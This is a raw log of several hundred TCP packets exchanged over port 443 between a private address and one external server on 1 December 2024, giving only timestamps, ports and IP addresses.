                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031821012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031850100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031960011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036655903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036684036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036745071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036753893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036784887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.036845922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042144060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042172909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042295933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042295933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042304039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.042536020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.047889948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.047911882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.047947884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.047956944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.048054934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.048054934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.052819967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.052838087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.052958965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.052958965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.052968979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.053050995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.053050995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.058901072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.058917999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.058968067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.058979034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.059004068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.059010983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.062355995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.063882113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.063905001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.063946009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.063954115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.063992023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.072173119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227375984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227407932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227551937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227551937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227581978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.227629900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232343912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232364893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232410908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232417107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232451916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.232470989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238081932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238105059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238152027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238157988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238192081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.238199949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243649960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243669987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243714094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243719101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243750095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.243772030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248739958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248760939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248807907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248814106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248836040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.248852015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.254316092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.254338980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.254391909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.254400969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.254442930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.259612083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.259629965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.259682894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.259690046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.259727955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.265640020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.265660048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.265722990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.265731096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.265769005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.428715944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.428744078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.428900957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.428924084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.428972006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.434245110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.434266090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.434364080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.434372902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.434406996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.439337015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.439359903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.439445019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.439481974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.439528942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.444998980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.445029974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.445106983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.445116043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.445153952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450659990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450689077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450752974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450773001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450790882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.450810909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456351995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456381083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456432104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456445932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456474066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.456490993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461688995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461716890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461780071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461791992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461818933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.461832047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.467183113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.467211962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.467289925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.467298031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.467396021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.500209093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.630182981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.630213022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.630279064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.630294085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.630332947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.635684013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.635704041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.635757923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.635768890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.635838032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640628099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640651941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640691996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640698910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640731096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.640744925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646426916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646452904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646498919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646505117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646538973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.646554947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.652004957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.652029991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.652096033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.652107954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.652143955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657752037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657780886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657814980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657825947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657851934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.657867908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663069963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663099051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663146019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663153887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663187027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.663203955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668004990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668035030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668083906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668092012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668116093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.668131113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.698120117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.831382990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.831409931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.831630945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.831648111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.831695080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.836983919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.837007999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.837068081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.837073088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.837110996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.837124109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.842993021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.843031883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.843100071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.843106031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.843147039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847760916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847781897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847832918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847841024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847872019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.847886086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.853329897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.853351116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.853410959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.853420019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.853460073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859383106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859406948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859457016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859464884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859493971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.859508991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864296913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864321947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864370108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864378929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864408970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.864425898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.946988106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.028897047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.028927088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.028970003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.028990984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.029017925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.029041052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033344984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033368111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033406019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033411026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033447027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.033467054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.038994074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.039016962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.039050102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.039092064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.039097071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.039135933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.044728041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.044753075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.044787884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.044792891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.044833899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.047298908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.049722910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.049751997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.049808979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.049817085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.049859047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055491924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055521011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055552959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055563927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055594921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.055610895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061069965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061098099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061130047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061140060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061167955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.061187029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066390991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066415071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066451073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066464901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066492081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.066508055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.120430946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.230165005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.230191946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.230289936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.230308056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.230457067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234683037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234699965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234752893 CET49721443192.168.2.6142.132.252.48
